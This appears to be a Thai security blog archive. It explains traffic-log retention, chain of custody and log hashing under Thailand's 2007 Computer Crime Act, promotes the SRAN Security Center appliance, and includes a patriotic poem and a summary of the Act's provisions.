ผมอยากให้ทำความเข้าใจ คำศัพท์ ที่เรียกว่า Log คือ อะไรเสียก่อน
จากการประกาศกฏกระทรวง เราจะพบ 3 ศัพท์ ที่ต้องสร้างความเข้าใจ นั้นคือ
คำว่า Data Traffic , คำว่า Data Archive และ คำว่า Data Hashing คืออะไร
Data Traffic คือข้อมูลจราจร ซึ่งข้อมูลจรารจรนี้เกิดขึ้น จากการสื่อสาร ที่มีฝั่งส่งข้อมูล และ ฝั่งรับข้อมูล ตามกลไกล ของ OSI 7 layer ซึ่งเป็นเส้นทางลำเลียงข้อมูล ผมมักจะกล่าวถึงรูปที่สร้างความเข้าใจง่ายได้ชัดขึ้นคือ หลักการที่ผมคิดขึ้นเองนั้นคือ 3 – in 3 – out
ซึ่งข้อมูลที่ไหลเวียนบนระบบเครือข่าย จะไม่สามารถดูย้อนหลังได้เนื่องจากเป็น Real – Time การดูย้อนหลังได้มีวิธีการเดียวคือ ดูจาก “Log”
ซึ่งในความหมายของ Log คืออะไรนั้น ผมให้คำนิยามว่า “ข้อมูลการใช้งานที่เกิดขึ้นแล้ว ซึ่งมีผลให้เกิดการเปลี่ยนแปลงในปัจจุบัน”
คุณเคยได้ยินคำกล่าวที่ว่า อากาศที่เราหายใจอยู่ ได้รับอิทธิพลจากแพนตอลใต้น้ำในมหาสมุทรแปซิฟิค และ ผีเสื้อกระพือปีกในประเทศจีน ก็อาจส่งผลให้เกิดพายุเฮอริเคนที่อเมริกา นี้คงเป็นเพราะทุกอย่างมันประสานความสอดคล้องกันอยู่เป็นห่วงโซ่ของความสัมพันธ์กันจากสิ่งหนึ่งไปสิ่งหนึ่ง บนเงื่อนไขของกาลเวลา การดำรงชีวิตของเราก็เช่นกัน ทุกรายละเอียดที่เราเคลื่อนไหว ก็ย่อมสร้างความเปลี่ยนแปลงให้เกิดขึ้น ไม่เคยหยุดนิ่ง วงโคจรของโลกมนุษย์หมุนรอบตัวเอง หมุนรอบดวงอาทิตย์ การหมุนนั้นทำให้สิ่งมีชีวิตได้มีการเปลี่ยนแปลง การหยุดนิ่ง หรือไม่เปลี่ยนแปลง มีอยู่อย่างเดียวนั้นคือไม่มีชีวิตอยู่
นี้เองจึงเป็นเหตุผลที่ผมให้คำนิยามว่า Log คือ ข้อมูลการใช้งานที่เกิดขึ้นแล้ว ซึ่งมีผลให้เกิดการเปลี่ยนแปลงในปัจจุบัน
ขอยกตัวอย่างเพื่อห้เห็นภาพความสัมพันธ์ที่เชื่อมโยงกัน จนเราไม่รู้ตัว เพียงคุณเอานิ้วกดที่ปุ่ม Enter ที่เครื่องของคุณเอง เพื่อเข้าเว็บไซด์ใดสักเว็บไซด์หนึ่ง ก็เกิดการเปลี่ยนแปลงขึ้นแล้ว แม้ว่าการกระทำนั้นไม่มีผลต่อความเสรียฐภาพเครื่อง Web Server เลยแม้แต่นิดเดียว แต่การสื่อสารของคุณและเว็บไซด์นั้น ก็จะเกิดร่องรอยแห่งการเปลี่ยนแปลงขึ้น เว็บไซด์นั้น ก็มีสถิติในวันนั้นมีหมายเลขไอพีของคุณ เข้าเยี่ยมชม เว็บไซด์
การรับส่งข้อมูลเกิดขึ้นแล้ว หรือถูกบันทึกไว้เป็น Log บนเว็บไซด์นั้นแล้ว จากปุ่ม Enter ของคุณผ่านการ์ดแลน หรือ Wi-fi จากเครื่องคุณเอง วิ่งตรงสู่ระบบเครือข่ายที่คุณอาศัยอยู่ วิ่งไปสู่ระบบอินเตอร์เน็ต จาก ISP ที่คุณใช้ เพื่อเรียกเว็บไซด์นั้นผ่าน Protocol HTTP port 80 โดยเป็นการเชื่อมต่อแบบ TCP จะนั้นเว็บไซด์ที่เข้าไปก็จะส่งการประมวลผลกับมาที่หน้าจอคุณ โดยมีการประมวลผลผ่านระบบ Operating System ซึ่งอาจเป็น Windows โดยใช้ IIS 6.0 หรือ Linux ที่ใช้ Apache อาศัย CPU / RAM ประมวลผลจากการเยี่ยมชมเว็บในครั้งนี้ และส่งค่าการประมวลผลนั้น ผ่านกับมาจากฝั่งเครื่อง Web server ผ่านระบบเครือข่ายที่เช่าพื้นที่อยู่บน Data Center (IDC) ใน ISP สักที่หนึ่งบนโลก (สมมุติ) และ ผ่านการ Routing จาก Router หนึ่งไปยังอีกที่หนึ่ง กลับมาสู่เครือข่ายที่เครื่องคอมพิวเตอร์ของคุณ ผ่านอุปกรณ์เครือข่าย Core Switch ในบริษัทของคุณ และมาถึงผู้รับสารภายในชั่วพริบตา และคุณก็ได้รับความบันเทิงจากเว็บไซด์นั้น อารมณ์ ความรู้สึกหลังจากได้ รับชมเนื้อหาในเว็บไซด์ที่เปิดแล้ว มีผลกับอายตนะทั้ง 6ของตัวเราเอง ซึ่งส่งผลต่อเนื่องสู่พฤติกรรมหลังจากรับรู้เว็บไซด์ดังกล่าวต่อไป เป็นต้น การเปลี่ยนแปลงย่อมเกิดขึ้นในปัจจุบันจากผลการคลิก Enter ของคุณเอง การเปลี่ยนแปลงนั้นคือ ความเสื่อมลง นั้นเอง การประมวลผลของ CPU เครื่องคอมพิวเตอร์ ทั้งฝั่งคุณ และฝั่งเว็บไซด์ เริ่มทำงานก็ย่อมเกิดความเสื่อม เสื่อมตามอายุขัย เสื่อมต่อการใช้งาน ซึ่งความเสื่อมเป็นตัวแปรหนึ่งของกาลเวลา
การที่คุณคลิกปุ่ม Enter เพียงแรงกดน้อยนิด การประมวลผลจากระบบปฏิบัติเครื่องคุณเอง ก็สร้างความเสื่อมบนเครื่องคอมพิวเตอร์ที่คุณใช้อยู่ รวมถึงการบันทึกเส้นทางการเดินทางที่มีความเร็วอย่างทันใจ ก็มีการบันทึกไว้บนอุปกรณ์ต่างๆ เช่น Switch ไปสู่ Firewall ไปสู่ Router จาก Router เมืองไทย ออกสู่ Router ต่างประเทศ และวิ่งตรงไปสู่เว็บไซด์ที่ต้องการ มีการถูกบันทึกไว้แล้ว บนอุปกรณ์ตามเส้นทางลำเลียงข้อมูล หรือหากไม่มีการเก็บบันทึกที่ถูกต้อง อย่างน้อยการบันทึกนั้นก็เกิดขึ้นในความทรงจำของคุณเอง และเลือนหายไปเพราะเราไม่ได้ใส่ใจ
และการไหลเวียนของข้อมูล ตามหลัก OSI 7 layer หรือ 3 in 3 out ที่ผมคิด คือห่วงโซ่ ของเหตุการณ์
ห่วงโซ่ของเหตุการณ์ เราเรียกว่า “Chain of Event”
ห่วงโซ่ของเหตุการณ์ ลำดับเหตุการณ์ตามเวลา ตามความเป็นจริง และเกิดเป็นประวัติของผู้ใช้งาน ประวัติของอุปกรณ์ที่ทำงาน และหากเป็นกรณีที่สำคัญและได้ถูกบันทึกไว้ก็จะกลายเป็นประวัติศาสตร์ และกรณีศึกษาต่อไป
สิ่งที่ควรบันทึกตาม ห่วงโซ่เหตุการณ์ คือ
Who ใคร , What อะไร , Where ที่ใด , When เวลาใด , Why (how) อย่างไร
ซึ่งการบันทึกสิ่งเหล่านี้ เราเรียกว่า “Data Arachive”
Data Archive ก็คือ Log จากห่วงโซ่ของเหตุการณ์ ถ้านำคำหมาย Log ที่กล่าวมา จะรวมประโยคนี้ได้ว่า Data Archive คือ พฤติกรรมการใช้งานที่เกิดขึ้นแล้ว ซึ่งมีผลให้เกิดการเปลี่ยนแปลงในปัจจุบัน จากห่วงโซ่ของเหตุการณ์
แต่เรายังขาดความน่าเชื่อถือในการเก็บบันทึก Data Archive นี้ เนื่องจาก Log เองก็อาจเกิดเปลี่ยนแปลงได้จากใครก็ได้ ที่มีความรู้ และแก้ไขเปลี่ยนแปลง เหตุการณ์จากห่วงโซ่ของเหตุการณ์นี้ ้ ถึงแม้การแก้ไข อาจเกิดขึ้น บนห่วงโซ่เหตุการณ์ใดเหตุการณ์หนึ่ง แต่ก็ยังมีร่องรอยการใช้งานจากห่วงโซ่ที่เหลืออยู่ได้ เพียงแค่ว่าการแก้ไขได้ อาจส่งผลให้ข้อมูลตามห่วงโซ่นั้นมีความคลาดเคลื่อน ไปได จนไม่สามารถสืบหาสาเหตุได้ พูดง่ายๆ ว่าหลักฐานไม่เพียงพอได้เช่นกัน
ห่วงโซ่เหตุการณ์ (Chain of event) นั้นจึงควรถูกคุ้มกัน คุ้มครอง เพื่อเป็นการรักษาข้อมูลที่เก็บบันทึกนั้นให้คงสภาพเดิม ซึ่งเรามีศัพท์เรียกว่า “Chain of Cusdoty”
สาระสำคัญของ พ.ร.บ. ว่าด้วยการกระทำผิดเกี่ยวกับคอมพิวเตอร์ ที่หลายคนมักตั้งคำถามว่า เก็บแบบไหนถึงจะพอเพียง
การเก็บพอเพียง ก็เพียงแค่คุณตอบให้ได้ ตาม Chain of event และมีการเก็บรักษาแบบ Chain of Custody ให้ได้ก็พอ ไม่ว่าจะใช้เทคโนโลยีใด แบบใด เมื่อเจ้าหน้าที่พนักงานเข้ามาขอ Log หรือ เจ้าของบริษัทเองต้องการทราบถึงการใช้งานพนักงานตัวเอง ตอบให้ได้ตามที่ผมกล่าวมานี้ ก็มีประโยชน์ทั้ง ทำถูกต้องตามกฏหมาย และ ทำได้ตามความต้องการของนายจ้างอีกด้วย
จะลงทุนหลักล้าน หรือ หลักแสน ในการเก็บบันทึกข้อมูลจราจร (Data Traffic Log Recorder) สำคัญอยู่ที่ ได้เก็บครบตามนี้หรือไม่ คือ
1. Data Archive เก็บ Log จากห่วงโซ่เหตุการณ์ (Chain of event) หรือไม่ ส่วนใหญ่แล้วอุปกรณ์ syslog , SIEM (Security Information Event Managment) สามารถจัดทำแบบ Data Archive ได้อยู่แล้ว
2. มีการทำ Data Hashing หรือไม่ คือมีการเก็บ Log เพื่อรักษาหลักฐานและยืนยันความถูกต้องของเนื้อหา Log จากห่วงโซ่เหตุการณ์ คือ เนื้อ file Log มีการยืนยันค่า Integrity หรือไม่ ตรงนี้สำคัญ เพราะว่าหากลงทุนโดยใช้งบประมาณจำนวนมากแล้ว แต่ไม่ได้ทำการ Check Integrity files โดยสากลใช้ Algorithm MD5 , SHA-1 เพื่อใช้ในการ check Log files แล้ว หรือ นำ Log files ที่ได้เขียนข้อมูลลงในแผ่น CD และเก็บบันทึกเป็นรายวันไป การลงทุนที่ว่าจะไม่มีเกิดประโยชน์เลยหากไม่มีการยืนยันความถูกต้องของหลักฐานจาก Log files สิ่งนี้ผู้ที่ต้องจัดหาเทคโนโลยีในการเก็บบันทึกข้อมูล นั้นจำเป็นต้องให้ความสำคัญมาก เพราะจัดหามาแล้ว อาจใช้ไม่ได้ตรงตามข้อกำหนดของ พ.ร.บ นี้ก็ได้ หรือในกรณีที่ต้องถึงชั้นศาล ก็ไม่สามารถยืนยันหลักฐานนี้ในชั้นศาลได้ถึงความถูกต้องของข้อมูล
สรุป :
Log คือ ข้อมูลการใช้งานที่เกิดขึ้นแล้ว และมีผลให้เกิดการเปลี่ยนแปลงในปัจจุบัน
Log Record คือ การเก็บบันทึกข้อมูล ซึ่งข้อมูลตรงนี้ก็คือ ข้อมูลสารสนเทศ ที่เกิดจาก Data Traffic ที่เกิดจากการสื่อสารระหว่างผู้ส่งสาร ถึง ผู้รับสารนั้นเอง
Data Traffic = Information + 3 in 3 out ซึ่งทำให้เกิด Log
Data Archive = Log Record + Chain of Event
Data Hashing = Log Record + Chain of Custody
เพียงเท่านี้ก็เป็นการเก็บบันทึกข้อมูลจราจร แบบเพียงพอ และมีประโยชน์สำหรับเจ้าหน้าที่พนักงาน หรือ ตำรวจในการพิสูจน์หาหลักฐานต่อไปได้
หากทำความเข้าใจตามที่ผมกล่าวแล้วการสิ้นเปลืองงบประมาณในการจัดหาเทคโนโลยี จะลดลง ลดความสับสนว่าจะเก็บ Log อย่างไรให้ถูกต้อง และงบประมาณที่เหลือไปสร้างองค์ความรู้ให้กับคน เพื่อให้คนใช้เทคโนโลยีได้ถูก และ ให้กระบวนการควบคุมคนอีกชั้น เพื่อความเป็นระบบ และตรวจสอบได้
การใช้เทคโนโลยีที่เพียงพอแล้วคือการจัดเก็บบันทึกข้อมูลแบบ Hybrid Log Recorder ซึ่งสามารถอ่านเพิ่มเติมได้ที่ http://www.sran.net/archives/200 ซึ่งผมจะขอโอกาสได้อธิบายในส่วนนี้อีกครั้งในบทความต่อไป
ซึ่ง Hybrid ทำให้สะดวกในการติดตั้ง ออกแบบ และใช้งาน ไม่เปลือง Storage ลดงบประมาณในการจัดหาอุปกรณ์เก็บบันทึกข้อมูลจราจร แต่ทั้งนี้ก็ยังไม่เพียงพอต่อการจัดหาเทคโนโลยีให้ครบถ้วนได้ ดังนั้นผมจึงออกแบบเครือข่ายที่เรียกว่า เครือข่ายตื่นรู้ขึ้น ซึ่งเป็นที่ทราบกันดีว่าองค์ประกอบสำคัญในการจัดทำระบบความมั่นคงปลอดภัยข้อมูล สารสนเทศ นั้นประกอบด้วย 3 ส่วน นั้นคือ เทคโนโลยี คน และ กระบวนการ การสร้างเครือข่ายตื่นรู้ มีจุดประสงค์เพื่อสร้างในส่วนเทคโนโลยีให้ครบ อย่างพอเพียง ครบในที่นี้ ต้องครบแบบปลอดภัยด้วย และสามารถรู้ทันปัญหาได้อย่างมีระบบ เพราะเรารู้ว่าไม่มีอะไรที่ป้องกันได้ 100% แต่เรารู้ทันได้หากมีระบบที่เหมาะสม การที่เราเน้นในเรื่องเทคโนโลยีเพียงอย่างเดียวและทำไม่ครบ ก็ย่อมจะไม่เกิดประโยชน์ ดังนั้นหากมีสูตรสำเร็จ เพื่อเป็นการตัดสินใจในการเลือกหาเทคโนโลยีเข้ามาใช้ในองค์กรก็จะมีประโยชน์ อย่างมาก
และนี้เป็นอีกเหตุผลหนึ่ง ที่ผมต้องทำเทคโนโลยี ในส่วนนี้ให้เป็นจริง และมีประโยชน์กับผู้ใช้งานให้ได้ในชั่วชีวิตนี้ของผมเอง
นนทวรรธนะ สาระมาน
Nontawattana Saraman
4/03/51
เรื่องที่เกี่ยวข้อง การสร้างเครือข่ายตื่นรู้ (Energetic Network)
การใช้งาน SRAN Security Center อย่างถูกวิธี
อุปกรณ์ SRAN Security Center หลายคนมักจะคิดว่าเราเพียงเป็น IDS/IPS (Intrusion Detection & Prevention System) เนื่องจากอุปกรณ์สามารถติดตั้งแบบ In-line และแบบ Passive ได้ในตัวอุปกรณ์เอง แต่ในความเป็นจริงแล้ว IDS/IPS เป็นเพียงเทคโนโลยีหนึ่งที่เรานำมาใช้งาน เป็นเพียงองค์ประกอบส่วนหนึ่งใน SRAN Security Center
เทคโนโลยี SRAN Security Center ดังต่อไปนี้
1. เทคโนโลยี Network Analysis คือรวบรวมเหตุการณ์ที่เกิดขึ้นบนระบบเครือข่าย ทำการวิเคราะห์ Bandwidth , Application Protocol ตามลำดับชั้นเครือข่ายคอมพิวเตอร์ ตั้งแต่ Link Internet (Border Network) ลงสู่เครือข่าย LAN และเครื่องคอมพิวเตอร์ในแต่ละเครื่อง (endpoint) ซึ่งเป็นเหตุการณ์ปกติที่ใช้งานกันทั่วไป
2. เทคโนโลยี IDS/IPS ใช้ในการเฝ้าสังเกตการ เหตุการณ์ที่ผิดปกติที่เกิดขึ้นบนระบบเครือข่าย (Threat Data Traffic) โดยเรียนรู้จากฐานข้อมูลความผิดปกติที่เกิดขึ้นบนระบบเครือข่าย และการวิเคราะห์จากสถิติการใช้งานที่ผิดปกติ
3. เทคโนโลยี VA/VM (Vulnerability Assessment & Management) เพื่อใช้ในการประเมินความเสี่ยงระบบเครือข่าย หาช่องโหว่ และออกรายงานผลความเสี่ยงพร้อมวิธีการปิดช่องโหว่ที่เกิดขึ้น
4. เทคโนโลยี Log Compliance เป็นการเก็บบันทึกข้อมูลจราจร (Data Traffic Archive) ที่เกิดขึ้นบนระบบเครือข่าย ทำการเปรียบเทียบเหตุการณ์ที่เกิดขึ้นจัดให้สอดคล้องกับมาตรฐานมั่นคงปลอด ภัยข้อมูลสารสนเทศ (Correlation Log) ในตัว พร้อมทั้งจัดทำข้อมูลที่เก็บบันทึกป้องกันไม่ให้เกิดการแก้ไขหรือเปลี่ยน แปลงได้ โดยการทำ Data Hashing ในตัวอุปกรณ์เอง
ซึ่งการ Correlation Log จะเกิดจากการเก็บบันทึกข้อมูลสารสนเทศ ตามเหตุการณ์ปกติ (Normal Data Traffic) เพื่อเก็บบันทึกข้อมูลไว้มากกว่า 90 วัน และ เหตุการณ์ไม่ปกติ (Threat Data Traffic) เพื่อทำการเปรียบเทียบตาม ISO 17799 และ พ.ร.บ. ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ ตาม มาตรา 5 – 12 ซึ่งออกรายงานผล ให้เราทราบถึงภัยคุกคามตามมาตราต่างๆ ที่อาจเกิดขึ้น (Self Assessment) ก่อนภัยนั้นจะมาเยือนถึงเราได้
ล่าสุดเราได้จัดทำเทคโนโลยี Hybrid เพื่อสร้างส่วนผสมสำคัญให้กับอุปกรณ์ SRAN Security Center เพื่อให้รองรับการรับ syslog หรือ SNMP Trap จากเครื่องแม่ข่ายที่สำคัญ ได้แก่ อุปกรณ์ Domain Controller , Proxy หรือ Gateway ของระบบได้อีกด้วย เป็นครั้งแรกในเมืองไทยที่ได้เปิดตัวเทคโนโลยีระบบรักษาความมั่นคงปลอดภัยข้อมูลสารสนเทศ นี้สู่สายตานานาชาติ ที่งาน CeBIT เยอรมันนี ซึ่งสามารถอ่านเพิ่มเติมเทคโนโลยีนี้ได้้ที่ http://www.sran.net/archives/200 จะสามารถทำ Hybrid Log Recorder ได้ในรุ่น SR – L ขึ้นไป จะเป็น Plug-in หนึ่งที่อำนวยความสะดวกให้แก่ผู้ใช้งาน และครบถ้วนด้านการเก็บบันทึกข้อมูลให้มีความแม่นยำมากขึ้นอีกด้วย
การผสมผสานเทคโนโลยีทั้ง 4 จึงเกิดขึ้นในอุปกรณ์เดียว โดยมีภาระกิจหลักคือ เฝ้าระวัง (Monitoring) วิเคราะห์ (Analysis) และเก็บบันทึก (Recorder)
เฝ้าระวัง เหตุการณ์ที่ไม่ปกติ (Threat Data Traffic)
วิเคราะห์ ข้อมูลจราจร พร้อมทำการจัดเปรียบเทียบตามมาตราฐาน (Compliance)
เก็บบันทึกข้อมูลจราจร หรือตามศัพท์ที่เรียกว่า “Data Archive” ซึ่งเกิดจากการไหลเวียนข้อมูลสารสนเทศ ตามเส้นทางลำเลียงข้อมูลจราจร ตามหลักการที่เรียกว่า 3 in 3 out และนำข้อมูลที่เก็บบันทึกจัดทำ Data Hashing เพื่อยืนยันการไม่เปลี่ยนแปลงของข้อมูลต่อไป ภาระกิจนี้เป็นการทำงานหลักของอุปกรณ์ SRAN Security Center ที่เกิดขึ้นตลอดเวลาเมื่อเริ่มเปิดเครื่อง และเชื่อมต่อ อุปกรณ์ SRAN บนระบบเครือข่าย (Network) ใช้งานจนเป็นวัฐจักร หรือ ระบบที่มีความต่อเนื่องคงที่ (System)่
SRAN Security Center เป็นอุปกรณ์ที่ขจัดปัญหา 4 ประการ ประกอบด้วย
1 ขจัดปัญหาในการติดตั้งระบบ (Implementation) ถูกออกแบบให้สะดวกในการใช้งาน ติดตั้งโดยไม่ต้องข้องเกี่ยวการค่า Config ระบบเดิม ไม่มีผลกระทบกับระบบเครือข่าย (ขอย้ำว่าการติดตั้ง SRAN ให้ถูกต้อง ควรติดตั้งแบบ Passive mode กับ Switch) เนื่องจากว่าเราไม่ได้ถูกออกแบบเป็นระบบ IPS (Intrusion Prevention System) โดยเฉพาะ ดังนั้นการติดตั้งแบบ in-line เพื่อให้ SRAN เป็นระบบป้องกันด้วยนั้นควรติดตั้งบนเครือข่ายขนาดเล็ก ที่มีเครื่อง client ไม่เกิน 200 เครื่อง และให้ดูขนาด Throughput , Concurrent Session เป็นหลัก ซึ่งควรหารุ่นที่เหมาะสม ถึงสามารถติดตั้งแบบ In-line ได้ ซึ่งสามารถอ่านรายละเอียดในแต่ละรุ่นได้จาก เอกสารคุณสมบัติ SRAN (USM) SecurityCenter ในแต่ละรุ่น 
ดังนั้นทั้งการติดตั้งแบบ in-line และ passive mode ก็ดี ทำให้การติดตั้ง SRAN ใช้เวลาไม่เกิน 2 นาทิในการติดตั้ง และไม่จำเป็นต้องเป็นผู้เชี่ยวชาญก็สามารถใช้งานได้ หลังการติดตั้งหากติดตั้งเหมาะสมกับรุ่นต่างๆ ก็จะทำให้ไม่มีปัญหาหลังการใช้งานได้
2. ขจัดปัญหาขนาดการจัดเก็บข้อมูล (Storage) เนื่องจาก Log ที่เกิดขึ้นทำการ Correlation จากเทคโนโลยี Network Analysis และ IDS/IPS ซึ่งทำให้ Log ที่เก็บบันทึก มีขนาดไม่ใหญ่ และมีการกรองแล้ว อยู่ได้เกิน 90 วันตามที่กฏหมายกำหนดได้ โดยใช้หลักการ Chain of Event เป็นหลักในการพิจารณา ว่า Who , What , Where , When , Why (How) โดยพิจารณาตาม Application Protocol ที่สำคัญได้แก่ Web , Mail , Chat , FTP , P2P
เพื่อรักษาหลักฐานและจัดเก็บบันทึกข้อมูลจราจร (Data Archive) ที่เกิดขึ้น
สามารถอ่านเพิ่มเติมได้ที่ http://www.sran.net/archives/205
ทั้งหมดนี้เป็นการพิจารณาการไหลเวียน ตามเส้นทางลำเลียงข้อมูลจราจร ตามหลักการที่เรียกว่า 3 in 3 out
การรักษาและบันทึกข้อมูลจราจร นี้เรียกว่า “Chain of Custody” ตามหลัก Computer/Network Forensic นั้นเอง และนี้คือ สาระสำคัญของ พ.ร.บ. ว่าด้วยการกระทำความผิดทางคอมพิวเตอร์ ปี 2550 ที่ประกาศใช้ ซึ่งเพียงพอแล้วสำหรับการเก็บบันทึกข้อมูลจราจร
และการทำ Data Archive นี้อุปกรณ์ SRAN Security Center ได้จัดเก็บบันทึกข้อมูลจราจร (Log Data Traffic) ให้ยืนยันความถูกต้องใน Log ที่จัดเก็บ และไม่สามารถแก้ไขข้อมูลได้ โดยการทำ Data Hashing โดยใช้ Algorithm MD5 ยืนยันค่า Log ที่เก็บไว้เป็นรายวัน จึงทำให้ Log ที่อุปกรณ์ SRAN จัดเก็บเป็นไปตามหลักที่กฏหมายไทย ได้เขียนขึ้น ครอบคุมโดยไม่ต้องใช้เทคโนโลยีอื่นเสริมจำนวนมากมาย เพียงอยู่ในอุปกรณ์เดียว และพร้อมใช้งานได้ทันที
3. ขจัดปัญหาการออกแบบ (Design) เนื่องจากเสร็จสิ้นอยู่ในอุปกรณ์เดียว จึงช่วยลดความซับซ้อนในการจัดหาเทคโนโลยีเพื่อใช้งานได้จริง อุปกรณ์ SRAN Security Center ประหยัดเวลาไปได้ ซึ่งทำให้ งบประมาณในการจัดหาอุปกรณ์ มีความคุ้มค่ามากขึ้น
4. ขจัดปัญหาลิขสิทธิรายอุปกรณ์ (License) ที่เป็นค่าใช้จ่ายที่ซ้อนเร้น เนื่องจากอุปกรณ์เก็บบันทึกข้อมูลจราจร ที่สามารถจัดเปรียบเทียบเหตุการณ์ (Correlation) ตามมาตราฐานต่างๆ (Compliance) ที่เรียกว่าว่าเทคโนโลยี SIEM (Security Information Event Management) โดยปกติจะมีค่าใช้จ่าย License ตามอุปกรณ์ (Devices) ที่ส่ง Log แต่อุปกรณ์ SRAN Security Center ไม่ได้คิดค่า License ตามอุปกรณ์ที่ส่ง Log จึงทำให้ลดค่าใช้จ่ายจำนวนมากเมื่อมีการติดตั้งและใช้งานจริงบนระบบเครือ ข่าย
จงจำไว้เสมอว่า การที่สร้างองค์กรของเราให้ปลอดภัยทางด้านไอทีแล้วนั้น ต้องเดินทางไปพร้อมกัน 3 ด้าน นั้นคือ ด้านเทคโนโลยี (Technology) ด้านคน (People) และด้านกระบวนการ (Process) มีเทคโนโลยีที่ดีและทันสมัย โดยมีคนเป็นผู้ใช้ และควบคุมเทคโนโลยี และมีกระบวน (Process) สร้างเป็นนโยบายรักษาความมั่นคงปลอดภัยข้อมูลสารสนเทศ (Security Policy) เป็นการควบคุมคนอีกชั้น หรืออาจจะกล่าวได้ว่า “นโยบายด้านความมั่นคง ปลอดภัยข้อมูลจะเป็นตัว คุมพฤติกรรมการทำงานคนในองค์กร เพื่อให้ คนใช้เทคโนโลยีอย่างถูกต้อง เหมาะสม อย่างมี สติ และปัญญา”
เทคโนโลยีด้านความปลอดภัยข้อมูลสารสนเทศ ต้องลดความซับซ้อนในการออกแบบ และการติดตั้ง ดูและรักษาได้ง่าย ตลอดระยะเวลา ทีม SRAN Dev ได้ทำการพัฒนาอุปกรณ์ SRAN Security Center แก้ไขหาจุดบกพร่อง ตลอดเวลา 4 ปี เรามั่นใจในคุณสมบัติทางเทคโนโลยีที่เราพัฒนาขึ้น เพราะเราเชื่อว่าไม่มีเทคโนโลยีใดที่สามารถป้องกันภัยคุกคามที่ระบบสารสนเทศ ได้ 100% แต่เราสามารถรู้ทันปัญหา ,ภัยคุกคามต่างๆ พร้อมรับมือและแก้ไขได้ อย่างทันเวลา จากอุปกรณ์ตัวนี้ ในชื่อ SRAN Security Center
นนทวรรธนะ สาระมาน
Nontawattana Saraman
29/02/51
มโนมอบพระผู้ ……สถิตย์อยู่ยอดสวรรค์
แขนถวายให้ทรงธรรม์ ….. พระผ่านเผ้าเจ้าชีวา
ดวงใจให้ขวัญจิต ….. ยอดชีวิตและมารดา
เกียรติศักดิ์รักของข้า …..ชาติชายแท้แก่ตนเอง
มโนมอบพระผู้ …..เสวยสวรรค์
แขนมอบถวายทรงธรรม์ …..เทอดหล้า
ดวงใจมอบเมียขวัญ …..และแม่
เกียรติศักดิ์รักข้า …. มอบไว้แก่ตัว
ไม่อยากโยงกับการบ้านการเมือง ณ เวลานี้ นะครับ เพียงแค่่อยากฟังเพลงนี้ เพราะความไพเราะ และเพื่อเคารพต่อ ชาติ ศาสนา และพระมหากษัตริย์ อันรวมเป็นประเทศของเรา เมืองไทยของเราได้จนถึงทุกวันนี้
ท้ิงท้ายด้วยเพลงใต้ร่มธงไทย ของหลวงวิจิตรวาทการ
|
เมื่อวันที่ 24 มกราคม 2550 ผมได้ร่วมสัมนากับทาง สำนักงานส่งเสริมอุตสาหกรรมซอฟต์แวร์แห่งชาติ (SIPA) ในหัวข้อการใช้โอเพนซอร์สกับภาครัฐ ตัวผมได้บรรยายหัวข้อซอฟต์แวร์โอเพนซอร์สกับความมั่นคงปลอดภัยของข้อมูลในภาครัฐ ให้กับตัวแทนในแต่ละกระทรวงได้รับฟัง ซึ่งเป็นที่แรกที่ได้กล่าวถึงแนวคิดเครือข่ายตื่นรู้ หรือที่เรียกเป็นภาษาอังกฤษที่เรียกว่า Energetic Network หลังการบรรยายเสร็จสิ้นได้มี ผู้สนใจจำนวนมาก ผมจึงถือโอกาสนี้มาเรียบเรียงการบรรยายในครั้งนั้นเป็นการเขียนบทความในครั้งนี้ ซึ่งบางท่านคงได้รับอ่านบทคามนี้มาบ้างแล้วจากนิตยสารบางเล่มที่จำหน่ายในปัจจุบัน
1. สาระสำคัญของ พ.ร.บ. ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ ปี พ.ศ. 2550
เมื่อมีการประกาศใช้ พ.ร.บ. ว่าด้วยการกระทำผิดทางคอมพิวเตอร์ขึ้น โดยการประกาศนี้มีโครงสร้างดังนี้
– คำนิยาม ชนิดการใช้งานคอมพิวเตอร์ ที่ใช้ใน พ.ร.บ. ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ ฯ
– หมวดที่ 1 ความผิดเกี่ยวกับคอมพิวเตอร์
– หมวดที่ 2 พนักงานเจ้าหน้าที่
ในส่วนคำนิยาม อยู่ใน มาตรา 3 ซึ่งให้ความหมายและคำจำกัดความ ระบบคอมพิวเตอร์ ข้อมูลคอมพิวเตอร์ ข้อมูลจราจรคอมพิวเตอร์ , ผู้ให้บริการ ซึ่งประกอบด้วย ผู้ให้บริการแก่ผู้อื่นในการเข้าสู่อินเตอร์เน็ท , ผู้ให้บริการเก็บรักษาคอมพิวเตอร์เพื่อประโยชน์กับบุคคลอื่น และ ผู้ใช้บริการ
หมวดที่ 1 ความผิดเกี่ยวกับคอมพิวเตอร์ ประกอบด้วยมาตรา 5 ,6,7,8,9,10,12 และ การใช้คอมพิวเตอร์ในการกระทำผิด ได้แก่ มาตรา 11,13,14,15,16
หมวดที่ 2 พนักงานเจ้าหน้าที่ ซึ่งในมาตรา 26 ผู้ให้บริการต้องเก็บข้อมูลจราจรทางคอมพิวเตอร์ (ที่ได้ระบุไว้ในมาตรา 3) ไว้ไม่น้อยกว่า 90 วัน ซึ่งชนิดของผู้ให้บริการประกอบด้วย 4 ประเภทได้แก่
– ผู้ประกอบกิจการโทรคมนาคม
– ผู้ให้บริการเข้าถึงระบบเครือข่ายคอมพิวเตอร์ ได้แก่ ISP , หน่วยงานราชการ , บริษัท , สถาบันการศึกษา , ผู้ให้บริการในการเข้าถึงระบบเครือข่ายในหอพัก , ร้านอาหาร , โรงแรม
– ผู้ให้บริการเช่าระบบคอมพิวเตอร์ หรือที่เรียกว่า Hosting Services Provider
– ผู้ให้บริการร้านอินเตอร์เน็ท
